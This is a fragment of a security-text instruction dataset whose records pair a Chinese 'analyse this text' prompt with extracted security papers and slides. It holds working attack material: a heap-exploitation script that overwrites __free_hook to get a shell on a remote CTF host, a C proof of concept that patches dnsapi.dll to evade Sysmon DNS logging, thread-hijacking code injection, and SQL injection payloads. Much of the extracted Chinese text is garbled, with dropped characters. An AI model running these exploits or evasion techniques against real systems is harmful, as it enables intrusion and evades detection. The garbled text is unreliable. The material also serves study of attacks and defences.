s.sendlineafter(\"Index: \",str(idx)) for i in range(8): add(0x10,0x10,'A\\n') for i in range(8): free(i) add(0x50,0x20,'A\\n')#0 s.sendlineafter(\">>\",\"1\"*0x500) for i in range(7): add(0x10,0x10,'A\\n') free(0) add(0x90,1,'a')#0 show(0) s.recvuntil(\"Content: \") tmp = u64(s.recv(6)+\"\\x00\"*2)-0x1ebb61 success(hex(tmp)) libc.address = tmp free_hook = libc.sym['__free_hook'] system = libc.sym['system'] for i in range(8): free(i) add(0x20,0x30,p64(free_hook)+\"\\n\")#0 add(0x30,0x30,p64(free_hook)+\"\\n\")#1 add(0x30,0x30,p64(free_hook)+\"\\n\")#2 add(0x30,0x30,p64(free_hook)+\"\\n\")#3 add(0x30,0x30,p64(free_hook)+\"\\n\")#4 free(1) free(2) free(3) free(4) add(0x231,0x10,'a\\n')#1 add(0x30,0x30,'a\\n')#2 add(0x30,0x30,'/bin/sh\\x00\\n')#3 # gdb.attach(s,\"b *$rebase(0x12ae)\\nc\") add(0x30,0x30,p64(system)+\"\\n\")#4 free(0) s.interactive() gun from pwn import * r = remote('123.57.209.176', 30772) # r = process(\"./gun\",env={'LD_PRELOAD':'./libc-2.31.so'}) context(arch='amd64', os='linux') libc = ELF('./libc-2.31.so') # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def launch_gdb(): context.terminal = ['gnome-terminal', '--'] # gdb.attach(proc.pidof(p)) print(\"gnome-terminal -- gdb attach \" + str(proc.pidof(r)[0])) os.system(\"gnome-terminal -- gdb -q ./gun \" + str", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 1 / 15 author: Y4er 前 看到zdi发了堆洞有反序列化录穿越权限绕过等等还是dotnet的于是有了此 基础架构 exe对应端 C:\\Program Files\\InfraSuite Device Master\\Device-DataCollect\\Device-DataCollect.exe 3000 C:\\Program Files\\InfraSuite Device Master\\Device-Gateway\\Device-Gateway.exe 3100 3110 C:\\Program Files\\InfraSuite Device Master\\Device-Gateway\\Device-Gateway.exe 80 443 CVE-2022-41778 https://www.zerodayinitiative.com/advisories/ZDI-22-1478/ 这个漏洞在3100和3110端 从TCP服务器到业务处理的逻辑如下 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 2 / 15 StartGatewayOperation中设置了关服务的些配置 初始化TCP端 监听IPv4 v6端DEFAULT_TCP_PORT 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 3 / 15 this.InitialWebEngine()中配置了web服务器 在StartControlLayer中起worker线程跑业务逻辑 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 4 / 15 也就是MainLoop 在DoUpperLayerNWPacket中根据PacketData的sHeader字段的i32PayloadType进switch case 随便进个case 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 5 / 15 看到 Serialization.DeSerializeBinary(sPacket.payload, out obj) 直接binaryformatter没啥好说的关键点在于怎么构造payload 构造payload 构造需要研究其tcp的处理逻辑在ControlLayerMngt的构造函数中 初始化了个TCPServerConnectionMngt在ModuleInitialization中定义了TCP链接的send和receive事件 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 6 / 15 我们发送给server的请求是receive事件被ReceiveCallBack处理 分别进addcheck操作 在add中将传的buffer赋予身this._gRxPacketBytesBuffer变存储字节数据 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 7 / 15 check中检查数据包格式重组PacketData对象 并调this.AddRxPacket(packetData)将重组的packet对象加this._gRxPacketList 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 8 / 15 回看MainLoop this.CheckUpperLayerNWPacket(); this.DoUpperLayerNWPacket(); Check调ReceivePacket判断this._gRxPacketList中是否有数据包 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 9 / 15 ReceivePacket调GetFirstRxPacket拿到第个数据包packet 然后调this._gUpperLayerNWPacketQueue.AddToSyncQueue(packetData)将数据包加到同步队列中 DoUpperLayerNWPacket就是拿到队列中的第个数据包 对ZDI公布的InfraSuite Device Master揽漏洞的分析.md 2022/11/8 10 / 15 到这的话就随便进个case拿CtrlLayerNWCmd_FileOperation举例 将PacketData的payload字段反序", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021 Akamai | Confidential 1 解码API安全 威胁挑战和最佳实践 无处不在的API API是数字化体验的中  移动应  站和应程序依赖于 API 来实现核功例 如登录  基于微服务的现代架构  API使得多户体验更强  法规要求使Web API (如PSD2 / Open Banking) API WEB应用攻击的 演进 Time Complexity Web应用攻击  DoS  Unvalidated Input  Authentication  Code execution 对Web应用和基 础设施的攻击  Buffer overflow  DoS/DDoS  XSS & SQLi  Zero trust 针对web应用基础设施API 和浏览器的多种攻击方式  Bots  API threats  Client-side threats  Multi-vector DDoS  Phishing (Use of DGA) 借助智能化和自动化的编排工具 通过武器化的机器学习算法和AI 技术进行多种的攻击方式 Deep learning and AI TODAY  2021 Akamai | Confidential 4 API 攻击 - 是攻击者的最佳选择 和传统攻击模式相比API具有更 好的攻击效果和更低廉的成本 4X 利用API的更多的撞库 攻击 API有更多的安全问 题和更多的脆弱性  2021 Akamai | Confidential 5 不断增长的API安全的重要性 多云混合环境 微服务架构 SaaS / IaaS / PaaS 移动 API的增长 - Akamai  API 请求占所有流量的83%  API 的年增长为 30%  在2024年API的调用将达到 42 Trillion By 2022, API abuses will be the most-frequent attack vector resulting in data breaches for enterprise web applications. - Gartner Research, How to Build an Effective API Security Strategy 2021  API Vulnerabilities disclosed for GraphQL Security, Facebook, YouTube, NoxPlayer, Clubhouse, healthcare apps, VMWare & Microsoft etc. - APISecurity.io is a community website for all things related to API security 更多的应用和逻辑迁移到云端 更强调创新的速度和敏捷性 API的可视化一直是一个大问题 缺乏日志和监控 组织经常低估API的威胁  低估影响  不充分的访问限制  采用过时的防护方法  没有API的报告  由于合作伙伴生态环境的集成经常低 估风险 为什么API的安全如此严峻?  2021 Akamai | Confidential 7 了解API的攻击界面 由于第三方API的集成导致的风险的增加 利用JSON/XML和Parser的攻击不断增长并且导致 了严重的业务中断 基于API的应用是HTML应用的3倍之多 攻击者利用了脆弱的认证和授权的实现 注入类型的攻击始终相关和普遍 攻击界面在转换 Specific attacks on JSON / XML and parser based Application vulnerabilities 3rd party integration Login abuse DoS / DDoS Auth Unauthorized use API  2021 Akamai | Confidential 8 撞库 DDoS 通过突发的分布式请求 来淹没API的端点 API 解析 通过Hash碰撞或者反 序列化的方法攻击API 语法解析的能力 畸形的API请求 对API输入的数据进行 模糊测试并对API schema进行深度嵌套 应用漏洞 在JSON/XML负载中 嵌入SQLiXSS脚本 利用已知漏洞进行攻 击 认证和授权 通过失效的对象级授 权和失效的认证绕过 认证和授权的控制 API攻击类型 认证 可用性 API暴露和授权问题 token / cookie 提取  2021 Akamai | Confidential 9 调查问卷1 您的单位都遭受过哪一类的API安全威胁 o 撞库 o DDoS o 畸形的API请求 o 应用漏洞 o 认证和授权 关注二维码了解更多信息 暴露", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSysmon简介 Sysmon是个Windows系统服务和设备驱动程序安装后会在系统启动时保持驻留状态实时监视和记录系统 活动并记录在Windows事件志中它提供有关进程创建络连接件创建时间更改等详细信息 我们可以通过对Sysmon记录的事件志进分析并了解侵者和恶意软件如何在络上运 Sysmon功能概述 1使完整的命令记录当前为的进程的进程创建 2使SHA1默认值MD5SHA256或IMPHASH记录过程映像件的哈希 3可以同时使多个哈希 4在进程创建事件中包含进程GUID即使Windows重进程ID时也可以使事件相关 5在每个事件中都包含个会话GUID以允许在同登录会话上关联事件 6使签名和哈希记录驱动程序或DLL的加载 7志打开以进磁盘和卷的原始读取访问 8可选记录络连接包括每个连接的源进程IP地址端号主机名和端名 9检测件创建时间的更改以了解真正创建件的时间修改件创建时间戳是恶意软件通常来掩盖其踪 迹的技术 10如果注册表中发更改则动重新加载配置 11规则过滤以动态包括或排除某些事件 12从启动过程的早期开始成事件以捕获甚复杂的内核模式恶意软件进的活动 Sysmon下载 Sysmon下载地址https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysmon 配置件下载地址https://github.com/SwiftOnSecurity/sysmon-config Sysmon安装 更新配置件: Sysmon志分析 Sysmon的事件志需要在Windows事件查看器中查看 Sysmon事件志的存储路径为 应用程序和服务日志/ Microsoft / Windows / Sysmon / Operational 分析域名解析对应的程序: 对Sysmon的事件志进筛选筛选事件ID为22的事件表DNS查询事件 这样即可对应发出DNS请求的程序 sysmon.exe -c sysmonconfig-export.xml SysmonDNS监控规避 参考@_xpn的博https://blog.xpnsec.com/evading-sysmon-dns-monitoring/ Sysmon会量依赖ETW来监控各种为搜索关键字定位的函数其实就是启了个provider https://docs.microsoft.com/en-us/windows/win32/etw/example-that-creates-a-session-and-enables-a-m anifest-based-provider DnsQuery_A 这个API在 DnsApi.dll 导出其中会发出事件以供注册的DNS事件provider记录 调堆栈如下最终调 McGenEventWrite 详细的windbg分析查看xpn原即可 事件会从 DnsApi.dll 内部发出并且由于该DLL会在我们可控的进程内调所以我们可以预章在运 时patch DNSAPI!McTemplateU0zqxqz 使其不通过 EtwEventWriteTransfer 发送相关事件直接返回 POC如下在执起来搜索 dnsapi.dll 中的 McTemplateU0zqxqz 这个API的位置然后更改第个值为RET使 其直接返回 #include <iostream> #include <Windows.h> #include <WinDNS.h> // Pattern for hunting dnsapi!McTemplateU0zqxqz #define PATTERN (unsigned char*)\"x48x89x5cx24x08x44x89x4cx24x20x55x48x8dx6c\" #define PATTERN_LEN 14 // Search for pattern in memory DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) { ULONG offset = 0; for (int i = 0; i < 0x200000; i++) { if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) { if (memcmp(mem + i, signature, signatureLen) == 0) { // Found the signature offset = i; break; } } } return offset; } int m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPerformance Improvements on Tor or, Why Tor is slow and what were going to do about it Roger Dingledine Steven J. Murdoch March 11, 2009 As Tors user base has grown, the performance of the Tor network has suffered. This document describes our current understanding of why Tor is slow, and lays out our options for fixing it. Over the past few years, our funding (and thus our development effort) has focused on usability and blocking-resistance. Weve come up with a portable self-contained Windows bundle; deployed tools to handle the upcoming censorship arms race; further developed supporting applications like Vidalia, Torbutton, and Thandy; made it easier for users to be relays by adding better rate limiting and an easy graphical interface with uPnP support; developed an effective translation and localization team and infrastructure; and spread understanding of Tor in a safe word-of-mouth way that stayed mostly under the radar of censors. In parallel to adding these features, weve also been laying the groundwork for performance improve- ments. Weve been working with academics to write research papers on improving Tors speed, funding some academic groups directly to come up with prototypes, and thinking hard about how to safely collect metrics about network performance. But its becoming increasingly clear that were not going to produce the perfect answers just by thinking hard. We need to roll out some attempts at solutions, and use the experience to get better intuition about how to really solve the problems. Weve identified six main reasons why the Tor network is slow. Problem #1 is that Tors congestion control does not work well. We need to come up with ways to let quiet streams like web browsing co-exist better with loud streams like bulk transfer. Problem #2 is that some Tor users simply put too much traffic onto the network relative to the amount they contribute, so we need to work on ways to limit the effects of those users and/or provide priority to the other users. Prob", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSITCH Inexpensive, coordinated GSM anomaly detection About Me  2000: Technology career started (I can get paid for this??)  2003: Started building with Linux  Came to infosec through systems and network engineering, integration  Security tools and integration (SIEM, HIDS, etc)  Current: R&D About You  Background in systems and network engineering  Interested in GSM threat detection  Tinfoil hat not required but not unwelcome! Ashmastaflash Thoughts and opinions expressed are my own. If you take anything away from this talk and act on it, Im not responsible if you go to jail, become a pariah, or your dog stops liking you. Know the laws youre subject to and operate accordingly. What Were Covering Today  Why Care?  Current Threat and Detection Landscape  Project Goals  SITCH: MkI  SITCH: MkII  Service Architecture  Future Plans  Prior Art  Q&A Why Care?  Invasions of privacy are bad, even when theyre unnoticed.  Industrial espionage costs money and jobs. WTF Is Under All That?? Is Anybody Home? Terminology  Software Defined Radio (SDR): Using software to perform signal processing in concert with an adjustable-frequency RF receiver  ARFCN: Absolute Radio Frequency Channel Number  BTS: Base Transceiver Station  CGI: Cell Global ID (MCC + MNC + LAC + CI)  MCC: Mobile Country Code  MNC: Mobile Network Code  LAC: Location Area Code  CI: Cell ID  IMSI: International Mobile Subscriber Identity GSM Addressing Threat and Detection Landscape  Malicious Devices  Indicators of Attack  Existing Detection Methods Hacked Femtocell Trusted part of providers network Your phone doesnt know its evil Evil BTS Handset will automatically associate, unable to assert trustworthiness Indicators of Attack  ARFCN over threshold  ARFCN outside forecast  Unrecognized CGI  Gratuitous BTS re-association  BTS detected outside of range Detection Methods  Commercial Options:  Pwnie Express  Bastille Networks  Open Source:  Fake BTS  AIMSICD  Femto Catcher Project Goals  Inexpensive (what can I get for $1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeaponize GhostWriting Injection Code injection series part 5 Prerequisites: This paper requires some knowledge about Windows system programming. Also, it is mandatory to be familiar with concepts presented in Code injection series part 1. License : Copyright Emeric Nasi , some rights reserved This work is licensed under a Creative Commons Attribution 4.0 International License. 1. Introduction Ghost writing is a technique which consists into injecting and running code in a remote process by manipulating the register states of one of its thread. This technique allows us to use code injection without opening the process or calling any remote memory allocation or writing functions. I havent found an implementation satisfying for 64bit code and generally the few existing implementation only describe limited shellcode injection so I decided to implement my own version and write something about it. Some tools I use to work on code injection:  Microsoft Visual Studio  Sysinternal Process Explorer  Sysinternal DebugView  X64dbg Contact information:  emeric.nasi[at]sevagas.com  https://twitter.com/EmericNasi  https://blog.sevagas.com/?-Code-injection-series-  https://github.com/sevagas Note: I am not a developer, so do not hesitate to send me source code improvement suggestion. I am also not a native English speaker. 1 2. Table of content 1. Introduction ..................................................................................................................................... 0 2. Table of content .............................................................................................................................. 1 3. Ghost Writing .................................................................................................................................. 2 3.1. About ghost writing ................................................................................................................. 2 3.2. Context Manipulation...............................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" %%%LICENSE_START(GPLv2+_DOC_FULL) .\\\" This is free documentation; you can redistribute it and/or .\\\" modify it under the terms of the GNU General Public License as .\\\" published by the Free Software Foundation; either version 2 of .\\\" the License, or (at your option) any later version. .\\\" .\\\" The GNU General Public License's references to \"object code\" .\\\" and \"executables\" are to be interpreted as the output of any .\\\" document formatting or typesetting system, including .\\\" intermediate and printed output. .\\\" .\\\" This manual is distributed in the hope that it will be useful, .\\\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\\\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\\\" GNU General Public License for more details. .\\\" .\\\" You should have received a copy of the GNU General Public .\\\" License along with this manual; if not, see .\\\" <http://www.gnu.org/licenses/>. .\\\" %%%LICENSE_END .\\\" .\\\" 2007-12-14 mtk Added Reiserfs, XFS, JFS. .\\\" .\\\" manpages-zh translator: Boyuan Yang <073plan@gmail.com> .TH FILESYSTEMS 5 2016-12-12 \"Linux\" \"Linux 程序员手册\" .nh .SH 名称 文件系统 \\- Linux 支持的文件系统类型ext, ext2, ext3, ext4, hpfs, iso9660, JFS, minix, msdos, ncpfs, nfs, ntfs, proc, Reiserfs, smb, sysv, umsdos, vfat, XFS, xiafs .SH 描述 通常情况下 .B proc 文件系统被挂载在 .IR /proc 目录下您可以在 .I /proc/filesystems 文件中找到当前内核支持的文件系统类型请参考 .BR proc (5) 了解详细信息 如果您需要使用一个当前所不支持的文件系统类型您需要插入相应的内核模块或重新编译内核 如需使用某个文件系统您必须先 .I 挂载mount 它详情请参考 .BR mount (8)  下面是对 Linux 内核支持或曾经支持的各种文件系统的简要描述 请查阅内核文档以获取所有选项和限制的详细描述 .TP 10 .B ext 是对 .B minix 文件系统的精心设计的扩展 它已经完全被扩展文件系统的第二版 .RB (ext2) 所淘汰并已在内核 2.1.21 版及后续版本中移除 .TP .B ext2 是高性能的文件系统被 Linux 系统同时应用于固定磁盘和可移动装卸介质上 第二版扩展文件系统被设计为扩展文件系统 .RB (ext) 的扩展详情请见 .BR ext2 (5)  .TP .B ext3 是 .B ext2 文件系统启用日志的版本 您可以在 .B ext2 和 .B ext3 之间轻松地来回切换 详情请见 .BR ext3 (5)  .TP .B ext4 是 .B ext3 的升级版包含一系列重要的性能和可靠性改进并大大提升了文件系统中卷文件目录的最大尺寸 详情请见 .BR ext4 (5)  .TP .B hpfs 是 OS/2 使用的高性能文件系统由于缺乏可用的文档 在 Linux 下这种文件系统是只读的 .TP .B iso9660 是满足 ISO 9660 标准的 CD-ROM 文件系统类型 .RS .TP .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndwangoAC TASBot the perfectionist The amazing life & achievements of... The amazing life & achievements of... Agenda  Intro to Speedrunning video games, Tool-Assisted Speedruns, and Emulators  TASBot: Playing back a TAS on real hardware  TAS techniques, history, evolution  Emulator tools - memory search, Lua scripting  Beyond emulators - disassemblers and Binary Ninja  Remaining limitations - emulator differences, inaccuracies  Key point: TAS tools are like really fun penetration testing tools  Interactive demo of Pokemon Red, Q&A Speedrunning - playing games fast  Inspired in part by in-game completion timers (Metroid)  Many categories, ranging from \"any%\" to \"low% no major glitches\"  SpeedDemosArchive.com and others track fastest completion times  Strict rules and peer review ensure no cheats or macros are employed  Highly entertaining, especially for a game you've played normally Speedrunning records verified from video captures or live at GDQ events Even beyond standard limits: blindfolded, 1-handed... Tool-Assisted Speedruns: playing games even faster  Also called Tool-Assisted Superplays, used as a noun or verb as TAS, TASing, TASed, etc.  Early TASs were usually made with tools built in to specific PC games (Doom, Quake)  By the late 90s, Doom Done Quick was well known, beating the game in 19:41 Tool-Assisted Speedruns (TAS)  Tool-Assisted Speedruns push the limits of the hardware and game rather than the human  Emulator tools include saving / loading game states, frame advance, and scripting  Movie files deterministically record every button press for later playback  Let's be honest, it's basically the Doped Olympics, with no rules  Bad idea when it comes to humans, but a lot of fun when beating games  A 2003 run of SMB3 by Morimoto was unlabeled, causing much controversy  TASVideos.org formed by Bisqwit, now hosts runs for many platforms by Morimoto  Live demo: TASBot playing back a movie of SMB3 on real hardware  Explanations forthcoming while TASBot happi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 报告工具 | Reporting Tools | | | | | | | :----------------------------------------------------------: | :--------: | :-------: | :----: | :------: | :--: | | [CaseFile](https://github.com/Jack-Liang/kalitools/blob/master/Reporting%20Tools/CaseFile.md) | CutyCapt | dos2unix | Dradis | KeepNote | | | MagicTree | Metagoofil | Nipper-ng | pipal | | |", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMITM插件SSRF公出检测 依赖条件 需要配置 yak bridge 公部署案详情https://github.com/yaklang/yak-bridge-docker 1. 使Yakit配置好公镜像 2. SSRF检测原理 触发条件 流经MITM的流量应该过滤下参数疑似SSRF参数应该参与测试 1. 参数条件 2. 参数名直接相关 redirect / url / url_callback / webhook / target .... 等 a. 参数值为 http(s?):// 开头的可以直接替换成我们想要的SSRF标 b. yaklang.io公镜像反连体系 基础知识https://www.yaklang.io/products/professional/yakit-in-practice-reverse 1. 当yak镜像服务器映射在公的时候任何连镜像服务器的请求将会被记录下来如果携带 Token也会被记录并且直接被对应到SSRF的漏洞中 2. 上述经过替换的携带SSRFPayload的请求触发了请求将会直接在数据库中记录下详细的请求 反连情况对应的Token也会对应到漏洞上 3. 案例 搭建靶场 我们在本地构建个SSRF的靶站代码常简单 当我们运我们的靶站在 http://127.0.0.1:8084/ssrf?url=http://www.baidu.com 的时候浏览器返回内容如下 测试过程 我们打开Yakit的中间劫持平台 点击被动扫描模式 我们构建个请求以MITM设置为代理 Go rsp, err := http.Get( `http://127.0.0.1:8084/ssrf?url=https://baidu.com`, http.proxy(\"http://127.0.0.1:8083\"), ) die(err) http.show(rsp) 1 2 3 4 5 6 7 当我们执该请求的时候MITM劫持平台将会收到该请求并且在请求流经过程中会镜像份出 来到SSRFHTTPPublic插件SSRF插件执之后将会在右边输出结果 发送到代理个请求 查看结果 当我们打开反连之后 核原理 核代码 其实家观察上述内容发现我们引个SSRF插件即可解决这个问题那么这个插件是如何编写 并且发挥作的呢 我们在这可以看到插件源码接下来就插件源码的核原理给家做简要描述 代码的结构常常简单 我们关注参数列表规则和镜像流量函数 核流程 我们发现检测的步骤其实可以常简单对应到我们的检测思路中如果家法很容易理解代码中的 内容我总结了个基本的测试流程 扩展与Bypass 当然熟悉的同学很容易发现插件的代码并不完美仍然有许多需要改进的地如 Host混淆技术与127.0.0.1混淆来bypass各种检查 1. 使schema混淆bypass检查 2. 标准位置的测试JSON中的SSRF检测 3. .... 4. 我们发现如果需要覆盖上内容插件仍然有很的进步和发展空间但是相应的发包量就会变 如果需要找到个均衡的点则需要更细节的控制完善脚本的检测逻辑", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n滴水逆向课程笔记  Win32 Win32课程介绍  1 1 Win32课程介绍 很多人对Win32的认识是错误的他们认为Win32就是画界面都已经学MFC了还学什么Win32 Win32不是用来画界面的如果你以后要在Windows写好程序是必须要学Win32的摆正学习态度 滴水逆向课程笔记  Win32 字符编码  2 2 字符编码 我们会经常接触到各种各样的字符编码本章节就来讲解一下常见的编码 2.1 原始的ASCII编码 计算机是由美国人发明的所以一开始设计编码的时候只会考虑到自身的元素采用ASCII编码完全可以满足其 需求但是计算机普及之后很多国家的文字是象形文字所以我们使用ASCII编码是无法满足需求的 2.2 ASCII编码的拓展GB2312或GB2312-80 由于ASCII编码无法满足需求所以在其基础上进行扩展大家都知道ASCII编码只有0-127用十六进制表示是 0x00-0x7F而之后的0x80-0xFF在标准的ASCII编码中是不存在的所以就出现了我们所说的ASCII编码的扩展 滴水逆向课程笔记  Win32 字符编码  3 但是这样能满足中文韩文这种象形文字吗其实并不可以如上这张表实际上使用频率很低而这时候 GB2312编码该编码与GBK没有什么本质区别无非就是收录的汉字和图形符号的区别GB2312标准共收录 6763个汉字GBK共收入21886个汉字和图形符号考虑到这个因素就占用了这张表那么是怎么占用的呢 其本质就是创建两张如上图所示的表然后进行拼接两个字节加起来就组成一个新的中文文字 例如中国的中这个字就是0xD0和0xD6拼接起来的这种编码是否存在问题这是必然的我们已经知道 了该编码的设计原理假设我们将中国这两个字发给国外的朋友他的电脑上并没有该编码表所以解析出 来的则不会是汉字而会出现大家所熟知的乱码 2.3 Unicode编码 为了解决ASCII的缺陷Unicode编码就诞生了那么Unicode是如何解决这一问题的呢 其实很简单Unicode编码创建了一张包含世界上所有文字的编码表只要世界上存在的文字符号都会赋予 一个唯一的编码 Unicode编码的范围是0x0-0x10FFFF其可以容纳100多万个符号但是Unicode本身也存在问题因为 Unicode只是一个符号集它只规定了符号的二进制代码却没有规定这个二进制代码应该如何去存储 假设中这个字以Unicode方式表示占2个字节而国这个字却占4个这个时候你该如何去存储 2.4 Unicode存储的实现方式 2.4.1 UTF-16 UTF-16/UTF-8是Unicode存储的实现方式UTF-16编码是以16个无符号整数位单位注意是16位为一个单位 但不表示一个字符就只有16位具体的要看字符的Unicode编码所在范围有可能是2字节有可能是4字节 现在机器上的Unicode编码一般指的就是UTF-16 滴水逆向课程笔记  Win32 字符编码  4 我们举个例子虚构 中Unicode编码0x1234 国Unicode编码0x12345 UTF-16存储的时候中这个字肯定是存储的0x1234但是国这个字就不一样 我们知道UTF-16是16位2 字节为一个单位所以国这个字拆下来存储应该是0x00 0x01 0x23 0x45 UTF-16的优点一看便知计算拆分解析非常方便2个字节为一个单位一个一个来 UTF-16是否是最优解呢其实不然我们通过如上的例子中可以看到一个很明显的缺点那就是UTF-16会存在 浪费空间的情况因为其16位2字节为一个单位它需要字节对齐例如字母A只需要一个字节就可以表 示而使用UTF-16时就会变成2个字节所以很浪费而这时候UTF-8横空出世UTF-16在本地存储是没有 啥问题的顶多就是浪费一点硬盘空间但是如果在网络中传输那就太过于浪费了 2.4.2 UTF-8 UTF-8称之为可变长存储方案其存储根据字符大小来分配例如字母A就分配一个字节汉字中就分配两个 字节 优点节省空间缺点解析很麻烦 UTF-8存储的方式是有对应表的 例如字母A在0x000000 - 0x00007F范围之间则采用0XXXXXX的方式进行存储也就是按照一个字节的方式来 不会改变什么而汉字中则不一样了 中Unicode编码0x4E 0x2D它属于0x000800 - 0x00FFFF范围之间 0x4E 0x2D = 0100 1110 0010 1101其以UTF-8的方式存储就是1110 (0100) 10(11 1000) 10(10 1101)括号包裹起来 的就是汉字中的Unicode编码 最后一个问题假设我们把UTF-8的文本格式发给对方那对方如果按照UTF-16的方式去解析该怎么办如何 让对方只采用UTF-8的方式去解析呢 2.5 BOMByt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一个注入点分析 请求 URL http://www.xxx.com POST 数据 dfpageControl.pageNum=1&dfpageControl.grd_gridId=PER&dfpageControl.co nditionStr=&dfpageControl.ducs[0].duc_fieldCondition=where_equals&dfpageC ontrol.ducs[0].duc_fieldValue=114730&dfpageControl.ducs[0].duc_fieldSplit= and &dfpageControl.ducs[0].duc_fieldName=per_code&dfpageControl.ducs[0].duc_ dataType=varchar 注入点dfpageControl.conditionStr 参数 注入点类型boolean-based blind波尔型盲注 测试一 测试过程 dfpageControl.conditionStr 为空如图 dfpageControl.conditionStr= and 1=1如图 dfpageControl.conditionStr= and 1=2如图 直接放入 SQLMAP 里跑结果如图 通过手工的方式数据库 dfpageControl.conditionStr= and 1=(select 1 from dual)如图 dfpageControl.conditionStr= and 1=(select 2 from dual)如图 dfpageControl.conditionStr= or 1=(select 1 from dual) 如图 至此判断 SQL 注入存在数据库为 oracle 通过手工的方式判断出 oracle 的话如果通过指定 sqlmap 的 dbms可以成功 通过对 sqlmap 发送的数据包进行分析对比使用 dbms 和不使用 dbms 的 payloads 区别 这一阶段 sqlmap 使用一系列的方式去判断数据库类型 [INFO] testing MySQL per_code = '114730' AND QUARTER(NULL) IS NULL [INFO] testing Oracle per_code = '114730' AND ROWNUM=ROWNUM [INFO] testing PostgreSQL per_code = '114730' AND 6932::int=6932 [INFO] testing Microsoft SQL Server per_code = '114730' AND SQUARE(8844)=SQUARE(8844) [INFO] testing SQLite per_code = '114730' AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID() [INFO] testing Microsoft Access per_code = '114730' AND VAL(CVAR(1))=1 [INFO] testing Firebird per_code = '114730' AND (SELECT COUNT(*) FROM RDB$DATABASE WHERE 3109=3109)>0 [INFO] testing SAP MaxDB per_code = '114730' AND ALPHA(NULL) IS NULL [INFO] testing Sybase per_code = '114730' AND @@transtate=@@transtate [INFO] testing IBM DB2 per_code = '114730' AND 5283=(SELECT 5283 FROM SYSIBM.SYSDUMMY1) [INFO] testing HSQLDB per_code = '114730' AND CASEWHEN(1=1,1,0)=1 从红色标记往下是测试 11 种数据库的请求包但由于 payload 会回显所以 不能通过长度判断 true or false只能通过页面内容 但实际上 sqlmap 并没有检测出 oracle如图 说明 SQLMAP 对此处的真和假的判断是错误的需要通过手工的方式指定返回 页面的真和假参考如下选项 通过上面手工测试的结果我知道真的响应正文包括一个 trd_desc可以用 来识别真和假的页面真的页面有 trd_desc假的页面没有 trd_desc如图 使用strings 选项如图 结果正常识别出 oracle如图 测试二 经测试上面 SQLMAP 的版本", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBYPASSING BIOMETRIC SYSTEMS WITH 3D PRINTING Yamila Levalle @ylevalle WHAT IS A BIOMETRIC SYSTEM? { } Behavioural Traits:  Gait  Voice  Signature Physical Traits:  Iris  Fingerprint  Ear Shape  DNA  Face  Vein Pattern HOW BIOMETRIC SYSTEMS WORK? BIOMETRIC SYSTEMS ATTACKS UNITED STATES 2010 PRESENTATION ATTACKS IN REAL LIFE BANK ROBBERY AND MASKED PLANE PASSENGER CANADA 2014 UNITED STATES 2015 CHINA 2011 Suspects on the left and suspects wearing masks on the right PRESENTATION ATTACKS IN REAL LIFE FAKE FINGERS HOW 3D PRINTING COULD HELP TO BYPASS BIOMETRIC SYSTEMS MAKING MY OWN EXPERIMENTS TO BYPASS BIOMETRIC SYSTEMS FINGERPRINT RECOGNITION Minutiae and Typica FINGERPRINT SENSORS OPTICAL FINGERPRINT SENSOR Optical fingerprint sensors are the oldest method of capturing and comparing fingerprints. this technique relies on capturing an optical image, essentially a photograph, and using algorithms to detect unique patterns on the surface, such as ridges or unique marks, by analyzing the lightest and darkest areas of the image. CAPACITIVE FINGERPRINT SENSOR Capacitive fingerprint sensors use tiny capacitor circuits to collect data about a fingerprint. As capacitors can store electrical charge, connecting them up to conductive plates on the surface of the scanner allows them to be used to track the details of a fingerprint. The charge stored in the capacitor will be changed slightly when a fingers ridge is placed over the conductive plates, while an air gap will leave the charge at the capacitor relatively unchanged. An integrator circuit is used to track these changes. ULTRASONIC FINGERPRINT SENSOR The hardware consists of an ultrasonic transmitter and a receiver. An ultrasonic pulse is transmitted against the finger that is placed over the scanner. Some of this pulse is absorbed and some of it is bounced back to the 